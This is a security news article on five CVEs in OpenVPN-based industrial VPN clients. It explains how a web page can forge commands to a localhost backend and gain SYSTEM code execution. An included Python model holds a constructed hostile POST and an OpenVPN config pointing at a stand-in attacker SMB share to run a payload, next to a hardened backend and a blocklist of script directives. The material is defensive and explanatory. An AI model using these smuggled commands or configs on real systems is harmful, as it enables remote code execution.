Serious Vulnerabilities Threaten OpenVPN-Based Applications

Claroty has issued a warning that products built on OpenVPN are at risk due to five serious vulnerabilities that could allow arbitrary code execution if a victim visits a malicious web page. These bugs affect solutions from companies such as HMS Industrial Networks, MB connect line, PerFact, and Siemens.

How the Vulnerabilities Work

Researchers found that vendors typically run OpenVPN as a Windows service under the SYSTEM account, and expose it through a control channel that any process on the machine can reach. As a result, any local application (or, through the victim's browser, a remote web page) that can talk to that channel can make OpenVPN start or stop connections with SYSTEM privileges. A quick check on a deployed host is to list the TCP listeners bound to 127.0.0.1 together with the owning process and the account it runs under; a localhost listener owned by a SYSTEM service with no authentication in front of it is the condition described here.

Generally, the VPN client-server architecture includes:

  • An external interface (a GUI application for the user)
  • A backend server (which receives commands from the external interface)
  • OpenVPN (a service managed by the backend, responsible for VPN connections)

In most cases, the dedicated socket channel used by the interface to control the backend uses a cleartext protocol without any authentication. According to experts, “anyone with access to the local TCP port listened to by the backend can potentially upload an OpenVPN configuration and force the backend to create a new OpenVPN instance with that configuration.”

Attack Scenario

Essentially, an attacker only needs to trick the victim into visiting a malicious website whose JavaScript sends a blind POST request to the VPN client's backend on the loopback address. The request is "blind" because the same-origin policy stops the page from reading the response, but the attacker does not need the response: the commands travel in the request body. The company describes this as a classic example of an SSRF (Server-Side Request Forgery). In practice the forged request originates from the victim's own browser and lands on a localhost port, so the backend cannot distinguish it from traffic sent by the legitimate GUI; that is the same pattern as a cross-site request against an unauthenticated local service.

“As soon as the victim clicks the link, an HTTP POST request is launched locally on the dedicated TCP port. Since HTTP is a cleartext protocol, with each line ending in \n, the backend server will read and ignore all lines until it reaches the required command,” the report states.

Because the backend automatically parses and executes any valid command it receives, it can be instructed to load a configuration file from a location the attacker controls. OpenVPN configuration directives can run external scripts and load plugins, so a crafted configuration leads to code execution or payload installation, and because the service runs as SYSTEM, the code runs with SYSTEM privileges.

Limitations and Requirements

One precondition limits remote code execution: the malicious configuration must be served from an SMB share the attacker controls and the victim can reach. In practice that means the attacker is already on the same network (or domain) as the target, or the victim's machine is allowed to make outbound SMB connections (TCP port 445) to the internet. Many perimeter firewalls block outbound 445, which is worth verifying as a mitigation while the affected products are patched.
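The command-smuggling step and the SMB precondition described above, modelled as an added example (this is not Claroty's proof of concept or any vendor's code; the affected backends are closed-source Windows services, so a Python model stands in for them): a line-oriented backend in the vulnerable style, a constructed browser POST that it would act on, and a hardened backend that demands a per-session token, refuses HTTP framing outright, and vets the configuration before OpenVPN is started. The command names (AUTH, LOAD_CONFIG, CONNECT, DISCONNECT), the port, the share name and the file contents are assumptions made for illustration.

```python
"""Model of the unauthenticated, line-oriented VPN backend described in the
article, beside a hardened variant.  Added example code, not Claroty's proof
of concept or any vendor's implementation; the command names (AUTH,
LOAD_CONFIG, CONNECT, DISCONNECT), the port, the share and the file contents
are assumptions made for illustration."""
import secrets

KNOWN_COMMANDS = {"LOAD_CONFIG", "CONNECT", "DISCONNECT"}

# Constructed: the body the malicious page's JavaScript would POST, and the
# request the browser wraps it in.  To a parser that skips unknown lines,
# the request line and headers are noise in front of the two commands.
POST_BODY = "LOAD_CONFIG \\\\attacker-smb\\share\\evil.ovpn\nCONNECT\n"
BROWSER_POST = (
    "POST / HTTP/1.1\r\n"
    "Host: 127.0.0.1:8443\r\n"
    "Content-Type: text/plain\r\n"
    f"Content-Length: {len(POST_BODY)}\r\n"
    "\r\n" + POST_BODY
)

# Constructed stand-in for the files the backend can read.  OpenVPN really
# does run the program named by `up` once `script-security 2` is set; the
# share and payload names are invented.
FAKE_FILES = {
    "\\\\attacker-smb\\share\\evil.ovpn":
        "client\nremote vpn.example.net 1194\n"
        "script-security 2\nup \\\\attacker-smb\\share\\payload.bat\n",
    "C:\\ProgramData\\vpn\\site.ovpn":
        "client\nremote vpn.example.net 1194\nverb 3\n",
}


def parse_commands(raw):
    """The vulnerable pattern: split on newlines, ignore every line that is
    not a known command, keep the rest in order.  Nothing here asks who
    sent the bytes."""
    found = []
    for line in raw.replace("\r\n", "\n").split("\n"):
        parts = line.split(maxsplit=1)
        if parts and parts[0] in KNOWN_COMMANDS:
            found.append((parts[0], parts[1] if len(parts) > 1 else ""))
    return found


# OpenVPN directives that make the daemon execute something other than
# OpenVPN itself.
SCRIPT_DIRECTIVES = {
    "script-security", "plugin", "up", "down", "route-up", "route-pre-down",
    "ipchange", "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "tls-verify",
}


def config_is_allowed(path, text):
    """Policy the backend should apply before OpenVPN sees a config: nothing
    loaded from a network share (the SMB precondition in the article) and
    no script-running directives.  Returns (allowed, reason)."""
    if path.startswith(("\\\\", "//")):
        return False, "config on a network share"
    for line in text.splitlines():
        fields = line.strip().split(maxsplit=1)
        if fields and fields[0].lower() in SCRIPT_DIRECTIVES:
            return False, "script directive " + fields[0]
    return True, "ok"


class HardenedBackend:
    """Same command set with three fixes: the GUI must open with a
    per-session secret (assumed to be handed over out of band, e.g. a file
    only the logged-in user can read), anything framed as HTTP is refused,
    and every config passes config_is_allowed() before OpenVPN is started."""

    def __init__(self, files=FAKE_FILES):
        self.token = secrets.token_hex(16)
        self.files = files
        self.started = []  # config paths that actually reached OpenVPN

    def handle(self, raw):
        lines = raw.replace("\r\n", "\n").split("\n")
        # A browser's request line always ends in "HTTP/x.y"; the GUI's never does.
        if lines[0].split(" ")[-1].startswith("HTTP/"):
            return "rejected: http framing"
        if lines[0] != "AUTH " + self.token:
            return "rejected: missing or wrong token"
        for cmd, arg in parse_commands("\n".join(lines[1:])):
            if cmd == "LOAD_CONFIG":
                ok, why = config_is_allowed(arg, self.files.get(arg, ""))
                if not ok:
                    return "rejected: " + why
                self.started.append(arg)
        return "ok"


if __name__ == "__main__":
    print("naive backend executes:", parse_commands(BROWSER_POST))
    backend = HardenedBackend()
    print("hardened, browser POST:", backend.handle(BROWSER_POST))
    print("hardened, GUI session:",
          backend.handle("AUTH " + backend.token + "\n" + POST_BODY))
```

Run as a script, the first line shows the naive parser pulling LOAD_CONFIG and CONNECT straight out of the HTTP body; the hardened backend rejects the same bytes before parsing, and even an authenticated GUI session cannot point OpenVPN at a configuration on a share. The token check matters more than the HTTP check: a browser cannot be made to omit the request line, but a local non-browser process can, and only the secret stops it.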

Vulnerabilities Identified

Following Claroty’s research, five vulnerabilities were assigned identifiers:

  • CVE-2020-14498 (CVSS score: 9.6, eCatcher HMS Industrial Networks AB)
  • CVE-2021-27406 (CVSS score: 8.8, OpenVPN client PerFact)
  • CVE-2021-31338 (CVSS score: 7.8, Siemens SINEMA RC client)
  • CVE-2021-33526 and CVE-2021-33527 (CVSS score: 7.8, MB connect line GmbH mbConnect Dialup)
